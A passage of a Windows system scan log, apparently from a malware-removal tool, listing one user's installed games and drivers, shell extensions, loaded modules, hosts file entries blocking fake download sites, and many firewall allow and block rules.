NVAPI Monitor plugin for NvContainer (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_NvContainer.NvapiMonitor) (Version: 1.19 - NVIDIA Corporation) Hidden
NVIDIA GeForce Experience 3.20.2.34 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 3.20.2.34 - NVIDIA Corporation)
NVIDIA Graphics Driver 445.75 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 445.75 - NVIDIA Corporation)
NVIDIA HD Audio Driver 1.3.38.26 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.38.26 - NVIDIA Corporation)
NVIDIA PhysX System Software 9.19.0218 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.19.0218 - NVIDIA Corporation)
Paradox Launcher v2 (HKLM\...\{BA8E5744-1CA9-41D1-98D4-09029A919D3B}) (Version: 2.0.2.0 - Paradox Interactive)
Promontory_GPIO Driver (HKLM-x32\...\{B5512BCC-F4CD-4159-86A4-B2AD7D38FFA9}) (Version: 2.0.1.0 - Advanced Micro Devices, Inc.) Hidden
Rags Suite (HKLM-x32\...\{7C60776C-C6EA-4C59-926B-BA76703D2608}) (Version: 2.4.16 - RagsGame)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 10.35.510.2019 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.8858.1 - Realtek Semiconductor Corp.)
Red Dead Redemption 2 (HKLM-x32\...\Red Dead Redemption 2) (Version: 1.0.1232.40 - Rockstar Games)
RivaTuner Statistics Server 7.2.3 (HKLM-x32\...\RTSS) (Version: 7.2.3 - Unwinder)
Roblox Player for r_omi (HKU\S-1-5-21-173970672-666801694-2624729176-1001\...\roblox-player) (Version:  - Roblox Corporation)
Rockstar Games Launcher (HKLM-x32\...\Rockstar Games Launcher) (Version: 1.0.19.234 - Rockstar Games)
Rockstar Games Social Club (HKLM-x32\...\Rockstar Games Social Club) (Version: 2.0.5.2 - Rockstar Games)
SHOUTcast Source DSP Plug-in v2 (HKLM-x32\...\SHOUTcast Source DSP) (Version: 2.3.5.222 - Radionomy SA)
Starsector by Fractal Softworks LLC (HKLM-x32\...\Starsector) (Version:  - )
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
Stellaris (HKLM-x32\...\1508702879_is1) (Version: 2.6.1.1 - GOG.com)
Stellaris: Ancient Relics (HKLM-x32\...\2106739867_is1) (Version: 2.6.1.1 - GOG.com)
Stellaris: Anniversary Portraits (HKLM-x32\...\1619776270_is1) (Version: 2.6.1.1 - GOG.com)
Stellaris: Apocalypse (HKLM-x32\...\1988097366_is1) (Version: 2.6.1.1 - GOG.com)
Stellaris: Arachnoid Portrait Pack (HKLM-x32\...\1897107160_is1) (Version: 2.6.1.1 - GOG.com)
Stellaris: Distant Stars Story Pack (HKLM-x32\...\1209094315_is1) (Version: 2.6.1.1 - GOG.com)
Stellaris: Federations (HKLM-x32\...\1790030450_is1) (Version: 2.6.1.1 - GOG.com)
Stellaris: Horizon Signal (HKLM-x32\...\1490429179_is1) (Version: 2.6.1.1 - GOG.com)
Stellaris: Humanoids Species Pack (HKLM-x32\...\2062279897_is1) (Version: 2.6.1.1 - GOG.com)
Stellaris: Leviathans Story Pack (HKLM-x32\...\1122806862_is1) (Version: 2.6.1.1 - GOG.com)
Stellaris: Lithoids Species Pack (HKLM-x32\...\1420212493_is1) (Version: 2.6.1.1 - GOG.com)
Stellaris: Megacorp (HKLM-x32\...\1316465607_is1) (Version: 2.6.1.1 - GOG.com)
Stellaris: Plantoids Species Pack (HKLM-x32\...\1999794856_is1) (Version: 2.6.1.1 - GOG.com)
Stellaris: Synthetic Dawn Story Pack (HKLM-x32\...\1292954230_is1) (Version: 2.6.1.1 - GOG.com)
Stellaris: Utopia (HKLM-x32\...\1978231244_is1) (Version: 2.6.1.1 - GOG.com)
Winamp (HKLM-x32\...\Winamp) (Version: 5.8  - Winamp SA)
WinRAR 5.80 beta 4 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.80.4 - win.rar GmbH)
X4: Foundations (HKLM-x32\...\X4: Foundations_is1) (Version:  - )
Candy Crush Friends -> C:\Program Files\WindowsApps\king.com.CandyCrushFriends_1.34.6.0_x86__kgqvnymyfvs32 [2020-04-10] (king.com)
Farm Heroes Saga -> C:\Program Files\WindowsApps\king.com.FarmHeroesSaga_5.34.8.0_x86__kgqvnymyfvs32 [2020-03-18] (king.com)
Forza Horizon 4 -> D:\Games\Forza Horizon 4\FH4 [2020-01-09] (Microsoft Studios)
Forza Horizon 4 Fortune Island -> D:\Games\Forza Horizon 4\FH4_FortuneIsland [2020-01-09] (Microsoft Studios)
Forza Horizon 4 LEGO Speed Champions -> D:\Games\Forza Horizon 4\FH4_Lego [2020-01-09] (Microsoft Studios)
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x64__8wekyb3d8bbwe [2019-12-03] (Microsoft Corporation) [MS Ad]
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x86__8wekyb3d8bbwe [2019-12-03] (Microsoft Corporation) [MS Ad]
Microsoft Solitaire Collection -> C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.6.1224.0_x64__8wekyb3d8bbwe [2020-03-26] (Microsoft Studios) [MS Ad]
MSN Weather -> C:\Program Files\WindowsApps\Microsoft.BingWeather_4.36.20714.0_x64__8wekyb3d8bbwe [2020-03-25] (Microsoft Corporation) [MS Ad]
NVIDIA Control Panel -> C:\Program Files\WindowsApps\NVIDIACorp.NVIDIAControlPanel_8.1.956.0_x64__56jybvy8sckqj [2019-12-03] (NVIDIA Corp.)
Realtek Audio Control -> C:\Program Files\WindowsApps\RealtekSemiconductorCorp.RealtekAudioControl_1.9.205.0_x64__dt26b99r8h8gj [2020-02-08] (Realtek Semiconductor Corp)
==================== Custom CLSID (Whitelisted): ==============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
CustomCLSID: HKU\S-1-5-21-173970672-666801694-2624729176-1001_Classes\CLSID\{46406D82-6EC0-47CC-8A75-1F33C6DEDBBE}\InprocServer32 -> C:\Users\r_omi\AppData\Local\Google\Update\1.3.35.442\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-173970672-666801694-2624729176-1001_Classes\CLSID\{540C17A8-04F2-4B66-95D7-B2FEF9A19B54}\InprocServer32 -> C:\Users\r_omi\AppData\Local\Google\Update\1.3.35.422\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-173970672-666801694-2624729176-1001_Classes\CLSID\{84EB3779-151B-4C71-AEF0-A0FEE9481401}\InprocServer32 -> C:\Users\r_omi\AppData\Local\Google\Update\1.3.35.342\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-173970672-666801694-2624729176-1001_Classes\CLSID\{A2C6CB58-C076-425C-ACB7-6D19D64428CD}\localserver32 -> C:\Users\r_omi\AppData\Local\Google\Chrome\Application\80.0.3987.163\notification_helper.exe (Google LLC -> Google LLC)
CustomCLSID: HKU\S-1-5-21-173970672-666801694-2624729176-1001_Classes\CLSID\{E8CF3E55-F919-49D9-ABC0-948E6CB34B9F}\InprocServer32 -> C:\Users\r_omi\AppData\Local\Google\Update\1.3.35.452\psuser_64.dll (Google LLC -> Google LLC)
CustomCLSID: HKU\S-1-5-21-173970672-666801694-2624729176-1001_Classes\CLSID\{E9E7529D-7F09-410B-AF2A-CC154473B19C}\InprocServer32 -> C:\Users\r_omi\AppData\Local\Google\Update\1.3.35.452\psuser_64.dll (Google LLC -> Google LLC)
ShellIconOverlayIdentifiers: [ IDM Shell Extension] -> {CDC95B92-E27C-4745-A8C5-64A52A78855D} => D:\Program Files\Internet Download Manager\IDMShellExt64.dll [2019-05-02] (Tonec Inc. -> Tonec Inc.)
ContextMenuHandlers1: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2019-02-21] (Igor Pavlov) [File not signed]
ContextMenuHandlers1: [ANotepad++64] -> {B298D29A-A6ED-11DE-BA8C-A68E55D89593} => D:\Program Files\Notepad++\NppShell_06.dll [2019-10-28] (Notepad++ -> )
ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2019-11-17] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2019-11-17] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers4: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2019-02-21] (Igor Pavlov) [File not signed]
ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\Windows\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_e0a5a1b06de180e3\nvshext.dll [2020-03-19] (NVIDIA Corporation -> NVIDIA Corporation)
ContextMenuHandlers6: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2019-02-21] (Igor Pavlov) [File not signed]
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2019-11-17] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2019-11-17] (win.rar GmbH -> Alexander Roshal)
==================== Codecs (Whitelisted) ====================
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
HKLM\...\Drivers32: [VIDC.RTV1] => C:\Windows\system32\rtvcvfw64.dll [246272 2012-09-29] () [File not signed]
HKLM\...\Drivers32: [VIDC.RTV1] => C:\Windows\SysWOW64\rtvcvfw32.dll [247296 2012-09-29] () [File not signed]
==================== Shortcuts & WMI ========================
(The entries could be listed to be restored or removed.)
ShortcutWithArgument: C:\Users\r_omi\Desktop\Chrome Remote Desktop.lnk -> C:\Users\r_omi\AppData\Local\Google\Chrome\Application\chrome_proxy.exe (Google LLC) ->  --profile-directory=Default --app-id=efmjfjelnicpmdcmfikempdhlmainjcb
ShortcutWithArgument: C:\Users\r_omi\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Chrome Remote Desktop (1).lnk -> C:\Users\r_omi\AppData\Local\Google\Chrome\Application\chrome_proxy.exe (Google LLC) ->  --profile-directory=Default --app-id=efmjfjelnicpmdcmfikempdhlmainjcb
ShortcutWithArgument: C:\Users\r_omi\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Chrome Remote Desktop.lnk -> C:\Users\r_omi\AppData\Local\Google\Chrome\Application\chrome_proxy.exe (Google LLC) ->  --profile-directory=Default --app-id=gbchcmhmhahfdphkhkmpfmihenigjmpp
==================== Loaded Modules (Whitelisted) =============
2019-10-26 18:04 - 2019-10-26 18:04 - 000232960 _____ () [File not signed] C:\Program Files (x86)\MSI Afterburner\RTCore.dll
2019-10-26 18:03 - 2019-10-26 18:03 - 000057344 _____ () [File not signed] C:\Program Files (x86)\MSI Afterburner\RTFC.dll
2019-10-26 18:04 - 2019-10-26 18:04 - 000650240 _____ () [File not signed] C:\Program Files (x86)\MSI Afterburner\RTHAL.dll
2019-10-26 18:03 - 2019-10-26 18:03 - 000074240 _____ () [File not signed] C:\Program Files (x86)\MSI Afterburner\RTMUI.dll
2019-10-26 18:03 - 2019-10-26 18:03 - 000369664 _____ () [File not signed] C:\Program Files (x86)\MSI Afterburner\RTUI.dll
2019-12-03 22:55 - 2019-02-21 23:00 - 000078336 _____ (Igor Pavlov) [File not signed] C:\Program Files\7-Zip\7-zip.dll
2019-12-23 21:16 - 2019-12-23 21:16 - 001655296 _____ (Microsoft Corporation) [File not signed] C:\Windows\WinSxS\amd64_microsoft.vc80.mfc_1fc8b3b9a1e18e3b_8.0.50727.4053_none_8444db7d32915e4c\MFC80U.DLL
2019-12-23 21:16 - 2019-12-23 21:16 - 000047104 _____ (Microsoft Corporation) [File not signed] C:\Windows\WinSxS\amd64_microsoft.vc80.mfcloc_1fc8b3b9a1e18e3b_8.0.50727.4053_none_bc1d1e5b0be08790\MFC80ENU.DLL
2020-04-04 00:31 - 2010-03-31 04:56 - 000249856 _____ (Mozilla Foundation) [File not signed] C:\Program Files (x86)\Common Files\LaunchpadWeb\freebl3.dll
2020-04-04 00:31 - 2010-03-31 04:56 - 000098304 _____ (Mozilla Foundation) [File not signed] C:\Program Files (x86)\Common Files\LaunchpadWeb\nssdbm3.dll
2020-04-04 00:31 - 2010-03-31 04:56 - 000155648 _____ (Mozilla Foundation) [File not signed] C:\Program Files (x86)\Common Files\LaunchpadWeb\softokn3.dll
2019-12-03 22:24 - 2017-07-19 16:02 - 000236032 _____ (Thesycon Software Solutions GmbH & Co. KG) [File not signed] C:\Program Files\FiiO\FiiO_Driver\W10_x64\fiio_usbaudioapi.dll
==================== Alternate Data Streams (Whitelisted) ========
(If an entry is included in the fixlist, only the ADS will be removed.)
AlternateDataStreams: C:\Users\r_omi\Application Data:00e481b5e22dbe1f649fcddd505d3eb7 [394]
AlternateDataStreams: C:\Users\r_omi\Application Data:ec1be289b1dc3f0834b6b7f0a7240eb6 [362]
AlternateDataStreams: C:\Users\r_omi\Application Data:fbd50e2f7662a5c33287ddc6e65ab5a1 [394]
AlternateDataStreams: C:\Users\r_omi\AppData\Roaming:00e481b5e22dbe1f649fcddd505d3eb7 [394]
AlternateDataStreams: C:\Users\r_omi\AppData\Roaming:ec1be289b1dc3f0834b6b7f0a7240eb6 [362]
AlternateDataStreams: C:\Users\r_omi\AppData\Roaming:fbd50e2f7662a5c33287ddc6e65ab5a1 [394]
==================== Safe Mode (Whitelisted) ==================
==================== Association (Whitelisted) =================
==================== Internet Explorer trusted/restricted ==========
==================== Hosts content: =========================
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
2019-03-19 11:49 - 2020-03-19 22:25 - 000001256 _____ C:\Windows\system32\drivers\etc\hosts
109.94.209.70      fitgirlrepacks.co               # Fake FitGirl site
109.94.209.70      fitgirl-repacks.cc              # Fake FitGirl site
109.94.209.70      fitgirl-repack.com              # Fake FitGirl site
109.94.209.70      www.fitgirlrepacks.co           # Fake FitGirl site
109.94.209.70      www.fitgirl-repacks.cc          # Fake FitGirl site
109.94.209.70      www.fitgirl-repack.com          # Fake FitGirl site
==================== Other Areas ===========================
(Currently there is no automatic fix for this section.)
HKLM\System\CurrentControlSet\Control\Session Manager\Environment\\Path -> C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Program Files (x86)\NVIDIA Corporation\PhysX\Common;C:\Program Files\NVIDIA Corporation\NVIDIA NvDLISR
HKU\S-1-5-21-173970672-666801694-2624729176-1001\Control Panel\Desktop\\Wallpaper -> 
DNS Servers: 115.178.58.26 - 115.178.58.10
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: )
Windows Firewall is enabled.
==================== MSCONFIG/TASK MANAGER disabled items ==
==================== FirewallRules (Whitelisted) ================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
FirewallRules: [{182CE55F-019F-4262-907C-E0C1C7771434}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{A30C73E6-83D5-4D0F-A61D-395D4395AB54}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{021A2972-9A25-4ED9-9D35-E22CEFC3E81B}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (NVIDIA Corporation -> NVIDIA Corporation)
FirewallRules: [{4DC1F45C-180F-42F5-A7FC-5E18C1DAE51A}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (NVIDIA Corporation -> NVIDIA Corporation)
FirewallRules: [{9B5E0D20-1115-479C-96C4-8154A9282247}] => (Allow) D:\Steam\Steam.exe No File
FirewallRules: [{C24CBF5A-F321-441C-923E-2B6F3127A0FA}] => (Allow) D:\Steam\Steam.exe No File
FirewallRules: [{5B6523EE-C208-4DA5-B7D4-A9747EE251AC}] => (Allow) D:\Steam\bin\cef\cef.win7\steamwebhelper.exe No File
FirewallRules: [{C8098259-EC88-409D-B955-49EE58BA0261}] => (Allow) D:\Steam\bin\cef\cef.win7\steamwebhelper.exe No File
FirewallRules: [TCP Query User{106C1A7C-A60F-4458-811C-B68F396B0C60}C:\program files\lghub\lghub_agent.exe] => (Block) C:\program files\lghub\lghub_agent.exe (Logitech Inc -> Logitech, Inc.)
FirewallRules: [UDP Query User{1B89567F-A6A8-4C55-815C-F5A1BB5643DE}C:\program files\lghub\lghub_agent.exe] => (Block) C:\program files\lghub\lghub_agent.exe (Logitech Inc -> Logitech, Inc.)
FirewallRules: [{0EED8287-82A1-4E4D-8BC0-C712CC35DD4E}] => (Allow) D:\Steam\steamapps\common\War Thunder\launcher.exe No File
FirewallRules: [{6CEAAD03-63FD-4641-B498-52EEF6DD3001}] => (Allow) D:\Steam\steamapps\common\War Thunder\launcher.exe No File
FirewallRules: [TCP Query User{ED2DC4C3-0C3F-424E-951B-39B2685EC8F3}E:\tixati_portable\tixati_windows64bit.exe] => (Allow) E:\tixati_portable\tixati_windows64bit.exe No File
FirewallRules: [UDP Query User{77A18752-F0EA-4DB8-8228-499320E9D16C}E:\tixati_portable\tixati_windows64bit.exe] => (Allow) E:\tixati_portable\tixati_windows64bit.exe No File
FirewallRules: [{BC9E5DAD-5BA0-4CE8-8020-71A62B8D9BF6}] => (Allow) D:\Program Files\Steam\Steam.exe (Valve -> Valve Corporation)
FirewallRules: [{3712BE5E-EA84-491E-8E7C-9B0385202E23}] => (Allow) D:\Program Files\Steam\Steam.exe (Valve -> Valve Corporation)
FirewallRules: [{A825E6D0-B13C-4387-832D-3A84F21686EE}] => (Allow) D:\Program Files\Steam\bin\cef\cef.win7\steamwebhelper.exe (Valve -> Valve Corporation)
FirewallRules: [{670771C6-DDA4-4F1B-B793-B4041F0AAC2A}] => (Allow) D:\Program Files\Steam\bin\cef\cef.win7\steamwebhelper.exe (Valve -> Valve Corporation)
FirewallRules: [TCP Query User{802B797F-A7C2-49C1-B7D9-D98335060497}D:\program files\steam\steamapps\common\war thunder\win64\aces.exe] => (Block) D:\program files\steam\steamapps\common\war thunder\win64\aces.exe No File
FirewallRules: [UDP Query User{E02A665A-0EC6-4053-B5A2-9E41D46A4438}D:\program files\steam\steamapps\common\war thunder\win64\aces.exe] => (Block) D:\program files\steam\steamapps\common\war thunder\win64\aces.exe No File
FirewallRules: [TCP Query User{69012A07-3D0F-4128-AC5C-37029F5A64DA}D:\games\star wars jedi - fallen order\swgame\binaries\win64\starwarsjedifallenorder.exe] => (Block) D:\games\star wars jedi - fallen order\swgame\binaries\win64\starwarsjedifallenorder.exe No File
FirewallRules: [UDP Query User{D35DC9E9-3362-4DDA-8A76-C9D79D9B97BA}D:\games\star wars jedi - fallen order\swgame\binaries\win64\starwarsjedifallenorder.exe] => (Block) D:\games\star wars jedi - fallen order\swgame\binaries\win64\starwarsjedifallenorder.exe No File
FirewallRules: [TCP Query User{09E0B52A-76AE-4BD7-AA8E-420BBD02D541}C:\users\r_omi\appdata\local\google\chrome\application\chrome.exe] => (Block) C:\users\r_omi\appdata\local\google\chrome\application\chrome.exe (Google LLC -> Google LLC)
FirewallRules: [UDP Query User{5892BD5E-412C-4194-B75F-EC2AF3CDB647}C:\users\r_omi\appdata\local\google\chrome\application\chrome.exe] => (Block) C:\users\r_omi\appdata\local\google\chrome\application\chrome.exe (Google LLC -> Google LLC)
FirewallRules: [TCP Query User{A9DA2324-FCEA-434D-AF4D-42912FBF8C76}D:\program files\steam\steamapps\common\squad\squadgame\binaries\win64\squadgame.exe] => (Block) D:\program files\steam\steamapps\common\squad\squadgame\binaries\win64\squadgame.exe No File
FirewallRules: [UDP Query User{AEBF6442-5A28-47C9-BF8F-3BB8D4B95851}D:\program files\steam\steamapps\common\squad\squadgame\binaries\win64\squadgame.exe] => (Block) D:\program files\steam\steamapps\common\squad\squadgame\binaries\win64\squadgame.exe No File
FirewallRules: [{745FB8A5-CD28-4694-8C38-D514FBD0E462}] => (Allow) D:\Program Files\Steam\bin\cef\cef.win7x64\steamwebhelper.exe No File
FirewallRules: [{1651B606-8B81-4E61-89F0-0ED724019ABD}] => (Allow) D:\Program Files\Steam\bin\cef\cef.win7x64\steamwebhelper.exe No File
FirewallRules: [TCP Query User{8D8916FF-444D-4604-8383-427E17F8A9CF}D:\games\transport fever 2\transportfever2.exe] => (Block) D:\games\transport fever 2\transportfever2.exe No File
FirewallRules: [UDP Query User{261B334E-2FDB-4D1C-9A2D-D0CC12E1CE54}D:\games\transport fever 2\transportfever2.exe] => (Block) D:\games\transport fever 2\transportfever2.exe No File
FirewallRules: [{41D563CE-5986-4253-B2A6-CB57DC284812}] => (Allow) C:\Program Files\Rockstar Games\Red Dead Redemption 2\RDR2.exe (Rockstar Games, Inc. -> Rockstar Games)
FirewallRules: [{8BD648CC-D6AD-4177-B1DD-D5DBF4C30D09}] => (Allow) C:\Program Files\Rockstar Games\Red Dead Redemption 2\RDR2.exe (Rockstar Games, Inc. -> Rockstar Games)
FirewallRules: [TCP Query User{F18FBC2F-5EC9-4F2A-8CEA-44DCE2059AEA}D:\downloads\pandownload\pandata\aria2c.exe] => (Block) D:\downloads\pandownload\pandata\aria2c.exe No File
FirewallRules: [UDP Query User{62DDA1BA-44FC-47AF-B41A-D653D0A7CC77}D:\downloads\pandownload\pandata\aria2c.exe] => (Block) D:\downloads\pandownload\pandata\aria2c.exe No File
FirewallRules: [{3C6DD3FA-ED38-4794-A51D-B2B98399B97A}] => (Allow) C:\Program Files (x86)\Garena\Garena\2.0.1909.2618\gxxsvc.exe No File
FirewallRules: [TCP Query User{F23D2FB5-747D-4AE8-9004-4A8DD0EC7CA1}D:\games\32844\shadowtrackerextra\binaries\win64\pubglite-win64-shipping.exe] => (Block) D:\games\32844\shadowtrackerextra\binaries\win64\pubglite-win64-shipping.exe No File
FirewallRules: [UDP Query User{CFFA7444-1D27-4D55-8EE6-12FA8F30B259}D:\games\32844\shadowtrackerextra\binaries\win64\pubglite-win64-shipping.exe] => (Block) D:\games\32844\shadowtrackerextra\binaries\win64\pubglite-win64-shipping.exe No File
FirewallRules: [TCP Query User{86040B6C-9658-4674-8D48-C11DD72E1C28}D:\program files\steam\steamapps\common\war thunder\win64\aces.exe] => (Block) D:\program files\steam\steamapps\common\war thunder\win64\aces.exe No File
FirewallRules: [UDP Query User{F57CEC53-EA5A-4EEA-A27F-AED8DE439BA6}D:\program files\steam\steamapps\common\war thunder\win64\aces.exe] => (Block) D:\program files\steam\steamapps\common\war thunder\win64\aces.exe No File
FirewallRules: [TCP Query User{AFABE174-4032-47B5-9C4A-04E45FD21DBE}C:\program files\lghub\lghub_agent.exe] => (Block) C:\program files\lghub\lghub_agent.exe (Logitech Inc -> Logitech, Inc.)
FirewallRules: [UDP Query User{DCC6B781-22CD-4DE9-874F-DE2F63DEEDEA}C:\program files\lghub\lghub_agent.exe] => (Block) C:\program files\lghub\lghub_agent.exe (Logitech Inc -> Logitech, Inc.)
FirewallRules: [TCP Query User{B8282D30-5E87-4D00-8B7E-00409070F047}C:\users\r_omi\appdata\local\google\chrome\application\chrome.exe] => (Block) C:\users\r_omi\appdata\local\google\chrome\application\chrome.exe (Google LLC -> Google LLC)
FirewallRules: [UDP Query User{45BD5BA0-35CC-46A7-9471-246313F472E4}C:\users\r_omi\appdata\local\google\chrome\application\chrome.exe] => (Block) C:\users\r_omi\appdata\local\google\chrome\application\chrome.exe (Google LLC -> Google LLC)
FirewallRules: [{3B2F4B9A-1B19-426E-BD9D-E819E323FF93}] => (Allow) C:\Program Files (x86)\Google\Chrome Remote Desktop\79.0.3945.10\remoting_host.exe (Google LLC -> Google Inc.)
FirewallRules: [{DDB0B5CA-DA6B-4BC2-9E66-204EB88E40B1}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (NVIDIA Corporation -> NVIDIA Corporation)
FirewallRules: [{19415305-8053-47C6-B61B-4A09FBF7B0A7}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (NVIDIA Corporation -> NVIDIA Corporation)
FirewallRules: [{F7AEF4A5-6BA3-4EC5-B1BC-174EBEFD46D0}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe (NVIDIA Corporation -> NVIDIA Corporation)
FirewallRules: [{6EFC342E-CCF4-4CBE-8A7D-B73C26B09174}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe (NVIDIA Corporation -> NVIDIA Corporation)
FirewallRules: [{C49EDD16-0316-4D3C-916A-3075DE25ADB9}] => (Block) D:\Games\Forza Horizon 4\FH4\Microsoft.SunriseBaseGame_1.332.904.2_x64__8wekyb3d8bbwe.exe No File
FirewallRules: [{43073E82-89F4-4DB1-BAB6-F1D202DBD934}] => (Block) D:\Games\Forza Horizon 4\FH4\Microsoft.SunriseBaseGame_1.332.904.2_x64__8wekyb3d8bbwe.exe No File
FirewallRules: [TCP Query User{28982854-2126-4462-8DCF-2FBBD837A024}D:\program files\shoutcast\sc_serv.exe] => (Allow) D:\program files\shoutcast\sc_serv.exe No File
FirewallRules: [UDP Query User{147E9954-8F74-4142-A59C-5531B3DC7738}D:\program files\shoutcast\sc_serv.exe] => (Allow) D:\program files\shoutcast\sc_serv.exe No File
FirewallRules: [{BE1D5FCC-B078-471F-872D-619E25836CDC}] => (Allow) D:\Program Files\Winamp\winamp.exe (Winamp SA -> Winamp SA)
FirewallRules: [{6C380A3A-ECEC-4B7E-869D-EAC4937CC4A5}] => (Allow) D:\Program Files\Winamp\winamp.exe (Winamp SA -> Winamp SA)
FirewallRules: [{D41B1F86-7B52-4227-B213-64B65A0B562F}] => (Block) D:\Games\Forza Horizon 4\FH4\Microsoft.SunriseBaseGame_1.332.904.2_x64__8wekyb3d8bbwe.exe No File
FirewallRules: [{7038D917-7B99-4643-986D-E65FB9A78110}] => (Block) D:\Games\Forza Horizon 4\FH4\Microsoft.SunriseBaseGame_1.332.904.2_x64__8wekyb3d8bbwe.exe No File
FirewallRules: [TCP Query User{22DB1287-4DFA-43EC-BFB6-03E1F21789FB}D:\games\paranoia - happiness is mandatory\paranoia.exe] => (Block) D:\games\paranoia - happiness is mandatory\paranoia.exe No File
FirewallRules: [UDP Query User{CD69CB50-1F32-42D9-B764-D6002A8C9477}D:\games\paranoia - happiness is mandatory\paranoia.exe] => (Block) D:\games\paranoia - happiness is mandatory\paranoia.exe No File
FirewallRules: [TCP Query User{6EE9436F-7FDF-4651-879C-B61D1BDE7B9C}D:\games\football manager 2019\fm.exe] => (Block) D:\games\football manager 2019\fm.exe No File
FirewallRules: [UDP Query User{8BC6CB48-8379-43FA-B136-5E07BC19666F}D:\games\football manager 2019\fm.exe] => (Block) D:\games\football manager 2019\fm.exe No File
FirewallRules: [TCP Query User{19BC9B37-9625-4A39-8F3A-21FE4C9FFE19}C:\games\football manager 2019\fm.exe] => (Block) C:\games\football manager 2019\fm.exe (Sports Interactive) [File not signed]
FirewallRules: [UDP Query User{6490B542-4680-4105-B835-08AF10644B39}C:\games\football manager 2019\fm.exe] => (Block) C:\games\football manager 2019\fm.exe (Sports Interactive) [File not signed]
FirewallRules: [TCP Query User{1DB1A8F5-DD40-4F04-BA46-0CAF70B0D5A9}D:\games\32844\shadowtrackerextra\binaries\win64\pubglite-win64-shipping.exe] => (Block) D:\games\32844\shadowtrackerextra\binaries\win64\pubglite-win64-shipping.exe No File
FirewallRules: [UDP Query User{DB8FC6F9-05D9-4ED7-ABC8-6ABCE8FEF316}D:\games\32844\shadowtrackerextra\binaries\win64\pubglite-win64-shipping.exe] => (Block) D:\games\32844\shadowtrackerextra\binaries\win64\pubglite-win64-shipping.exe No File
FirewallRules: [TCP Query User{228E0304-A58B-4C71-A8FB-9BBD5BE52D69}D:\program files\steam\steamapps\common\pubg\tslgame\binaries\win64\tslgame.exe] => (Block) D:\program files\steam\steamapps\common\pubg\tslgame\binaries\win64\tslgame.exe No File
FirewallRules: [UDP Query User{34B86083-7C48-48C5-B50C-ED9D0AE94D0A}D:\program files\steam\steamapps\common\pubg\tslgame\binaries\win64\tslgame.exe] => (Block) D:\program files\steam\steamapps\common\pubg\tslgame\binaries\win64\tslgame.exe No File
FirewallRules: [TCP Query User{0E780369-27D2-4BDB-BC34-83F3D0CAE4D6}D:\games\wolcen lords of mayhem\win_x64\wolcen.exe] => (Block) D:\games\wolcen lords of mayhem\win_x64\wolcen.exe No File
